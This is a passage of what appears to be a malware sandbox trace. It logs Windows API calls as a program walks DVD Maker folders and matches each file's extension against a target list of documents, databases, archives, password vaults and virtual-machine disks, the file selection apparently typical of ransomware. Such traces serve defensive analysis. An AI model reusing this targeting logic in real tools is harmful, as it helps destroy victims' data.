(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.172] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.172] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="flower_trans_rgb.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" [0040.172] PathFindExtensionW (pszPath="flower_trans_rgb.wmv") returned=".wmv" [0040.172] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.172] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.172] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.172] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="flower_trans_RGB_PAL.wmv" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" [0040.172] PathFindExtensionW (pszPath="flower_trans_RGB_PAL.wmv") returned=".wmv" [0040.172] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.172] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.172] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.172] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="highlight.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" [0040.172] PathFindExtensionW (pszPath="highlight.png") returned=".png" [0040.173] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.173] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.173] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.173] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="mainimage-mask.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" [0040.173] PathFindExtensionW (pszPath="mainimage-mask.png") returned=".png" [0040.173] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.173] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.173] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.173] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="notes-static.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" [0040.173] PathFindExtensionW (pszPath="notes-static.png") returned=".png" [0040.173] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.173] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.173] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.173] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", pszFile="play-static.png" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" [0040.173] PathFindExtensionW (pszPath="play-static.png") returned=".png" [0040.173] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.173] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.173] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.174] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.174] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.174] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", pszFile="BlackRectangle.bmp" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" [0040.174] PathFindExtensionW (pszPath="BlackRectangle.bmp") returned=".bmp" [0040.174] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".bmp.") returned 5 [0040.175] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".bmp.") returned 0x0 [0040.175] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.175] PathFindExtensionW (pszPath="circleround_glass.png") returned=".png" [0040.175] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.175] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.175] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.175] PathFindExtensionW (pszPath="circleround_selectionsubpicture.png") returned=".png" [0040.175] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.175] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.176] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.176] PathFindExtensionW (pszPath="circleround_videoinset.png") returned=".png" [0040.176] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.176] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.176] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.176] PathFindExtensionW (pszPath="Circle_ButtonGraphic.png") returned=".png" [0040.176] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.176] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.176] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.176] PathFindExtensionW (pszPath="circle_glass_Thumbnail.bmp") returned=".bmp" [0040.176] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".bmp.") returned 5 [0040.176] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".bmp.") returned 0x0 [0040.177] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.177] PathFindExtensionW (pszPath="Circle_SelectionSubpictureA.png") returned=".png" [0040.177] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.177] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.177] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.177] PathFindExtensionW (pszPath="Circle_SelectionSubpictureB.png") returned=".png" [0040.177] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.177] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.177] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.177] PathFindExtensionW (pszPath="Circle_VideoInset.png") returned=".png" [0040.178] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.178] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.178] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.178] PathFindExtensionW (pszPath="cloud_Thumbnail.bmp") returned=".bmp" [0040.178] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".bmp.") returned 5 [0040.178] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".bmp.") returned 0x0 [0040.188] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.188] PathFindExtensionW (pszPath="Dot.png") returned=".png" [0040.188] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.188] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.188] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.188] PathFindExtensionW (pszPath="DvdTransform.fx") returned=".fx" [0040.189] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".fx.") returned 4 [0040.189] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".fx.") returned 0x0 [0040.189] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.189] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 0x0 [0040.189] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*" [0040.189] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.192] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.192] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.192] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0040.192] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.192] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.192] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.192] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0040.192] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.192] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.192] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.192] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0040.193] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.193] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.193] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.193] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0040.193] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.193] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.193] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.194] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0040.194] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.194] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.194] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.194] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0040.194] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.194] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.194] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.195] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0040.195] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.195] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.195] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.195] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0040.195] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.195] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.195] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.195] PathFindExtensionW (pszPath="pagecurl.png") returned=".png" [0040.195] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.195] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.196] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.196] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.197] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.197] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 0x0 [0040.197] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*" [0040.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.199] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.199] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.199] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0040.199] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.199] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.200] FindNextFileW 